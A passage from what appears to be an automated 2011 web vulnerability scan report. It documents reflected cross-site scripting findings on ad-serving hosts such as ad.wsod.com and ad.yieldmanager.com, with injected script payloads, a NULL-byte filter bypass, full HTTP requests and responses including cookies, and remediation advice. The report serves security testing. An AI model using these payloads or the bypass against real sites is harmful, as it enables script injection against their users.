0q00600ef0lmq6u30jdl700i4y060r0760ieyvlmq6u30jdl700e4y060r0760ees4lmq6u30jdl700n4y060r0760nfcclmxnyj0bwgr00i4y060r0760i9wvlljn151pxe50254y060r0760yf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700n4y060r0760n0tille7v6232sn0274y060r0760yes0lmq6u30jdl700a4y060r0760a45mlluuyq0000001o4y060r0760yerzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ee8lmq6u30jdl700e4u000q00600ez9lmq6u30jdl700a4y060r0760a9gellnepl1m5pp01r4u000q00600; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24fn0j103210324omy7103210y24b47b103210624uz3i10pm10t2459ao103210324ncl2218e10q203210y2455ue103210x24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24vx8f127p10224fank103210324o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424qfys103210t24qqy7127p20020224ffmk103210024dx7s103210m2; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 28 Jun 2011 02:23:53 GMT
Connection: close
Content-Length: 2377

<IFRAME SRC="http://ad.doubleclick.net/adi/N4848.137909.MEDIA6DEGREES/B5113302.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=9141931727447453|cId=7020|cb=1309227831|notifyPort=8080|ex
...[SNIP]...
<script language="JavaScript">
(new Image(0,0)).src = "http://audit.303br.net?anId=40&pubId=1050&advId=35731&campId=4222&vURL=http%3A%2F%2Fwww.marketbuy54.com45282"-alert(1)-"e2957ef1876";
</script>
...[SNIP]...

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff927</script><script>alert(1)</script>16af8f04416 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXfAEHDVN0XdMlX9e0HqdD7Z8Ii7XAPqQR5D3MqoBkcZSiQJGDEJOwPQjJBedscwZVufWTF.zuK916qY_T81yfcDdZIVHw--%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253Dff927</script><script>alert(1)</script>16af8f04416 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1990:1225:0:0:45131:1308705162:B2|46:1354:804:44:0:45131:1308705130:B2|46:675:22:0:0:45131:1308705113:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 28 Jun 2011 04:20:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2928

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
52Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253Dff927</script><script>alert(1)</script>16af8f04416">
...[SNIP]...

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a11</script><script>alert(1)</script>563994603d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXfAEHDVN0XdMlX9e0HqdD7Z8Ii7XAPqQR5D3MqoBkcZSiQJGDEJOwPQjJBedscwZVufWTF.zuK916qY_T81yfcDdZIVHw--%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253D&92a11</script><script>alert(1)</script>563994603d1=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1990:1225:0:0:45131:1308705162:B2|46:1354:804:44:0:45131:1308705130:B2|46:675:22:0:0:45131:1308705113:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 28 Jun 2011 04:20:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2934

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
2Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253D&92a11</script><script>alert(1)</script>563994603d1=1">
...[SNIP]...

1.137. http://ad.yieldmanager.com/imp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00529be'-alert(1)-'e2b488d60e8 was submitted in the u parameter. This input was echoed as 529be'-alert(1)-'e2b488d60e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /imp?Z=300x250&s=1887835&_salt=2194753117&B=10&u=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D%00529be'-alert(1)-'e2b488d60e8&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; cafb=9nsYcb#?ajX4]w9; liday1=Uq::WE].vRW2IxdJDVT^X@u6WVAV)scUXkIW:]HX[x)fP)zdlA!/Hu>j.#Jx; caday1=TlGb]V-`/c!/Hu>cBb-M; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=
G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!
#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; pv1="b!!!!?!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$.w1!,x.^!%)<k!2jZq!%v%'!#:m1!?5%!)drC:!w1K*!(#l)!%C9A!(2_O~~~~~=)mWk=*.Pf!!!#G!$19-!,x.^!%)<k!349Y!'$Wk!%G9F!?5%!)drC:!w1K*!(#l)!%C9A!(:t<~~~~~=)m[Z=)yX,!!!#G!$190!,x.^!%)<k!349Y!'$Wk!%G9F!?5%!)drC:!w1K*!(#l)!%C9A!(:t<~~~~~=)m[Z=)yX,!!!#G!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#
RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q"; lifb=19kC6nGAQ+=*:mYO4LZ!XX>^U:?6)S`%_hj5jn]FcU3vucQ.!y%54b^)<HPu)9P]<`=o7ea<Eq?; ih="b!!!!a!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!#=)mpM!.g%_!!!!$=)moR!.g(s!!!!#=)mv/!.g(t!!!!$=)ms?!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!08vf!!!!#=)mbi!0Q8#!!!!#=)mx$!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!#=)mjl!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!$=)n%6!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2jZq!!!!#=)mWk!2j[4!!!!#=)mWB!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT!3'oN!!!!)=)n#A!349Y!!!!#=)m[Z!34t)!!!!#=)mrD"; vuday1=^cl#I:l(jr!/Hu>SXYW?; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:30:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0350.rm.bf1
Set-Cookie: ih="b!!!!d!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!#=)mpM!.g%_!!!!$=)moR!.g(s!!!!#=)mv/!.g(t!!!!$=)ms?!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!08vf!!!!#=)mbi!0Q8#!!!!#=)mx$!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!#=)mjl!1@m6!!!!$=%3V#!1U$i!!!!#=)n'd!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!#=)n'>!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!$=)n%6!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!#=)n%a!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2jZq!!!!#=)mWk!2j[4!!!!#=)mWB!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT!3'oN!!!!)=)n#A!349Y!!!!#=)m[Z!34t)!!!!#=)mrD"; path=/; expires=Thu, 27-Jun-2013 02:30:04 GMT
Set-Cookie: vuday1=^cl#L:l(jr!/Hu>/JbO9; path=/; expires=Wed, 29-Jun-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 02:30:04 GMT
Pragma: no-cache
Content-Length: 3097
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt language="Javascr'+'ipt" type="text/javascr'+'ipt" src="http://fw.adsafeprotected.com/rjss/at/9746/84741/M0N/jview/310675043/direct;wi.300;hi.250/01/1309
...[SNIP]...
';
var asci_advliid = '3255117';
var asci_cid = '8952013';
var asci_p = '200';
var asci_refurl = escape('http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=insert_random_number_here&loc=.529be'-alert(1)-'e2b488d60e8');
if ( asci_refurl.length >
...[SNIP]...

1.138. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda38"><script>alert(1)</script>a85a84a684d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1887835&cda38"><script>alert(1)</script>a85a84a684d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE&loc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
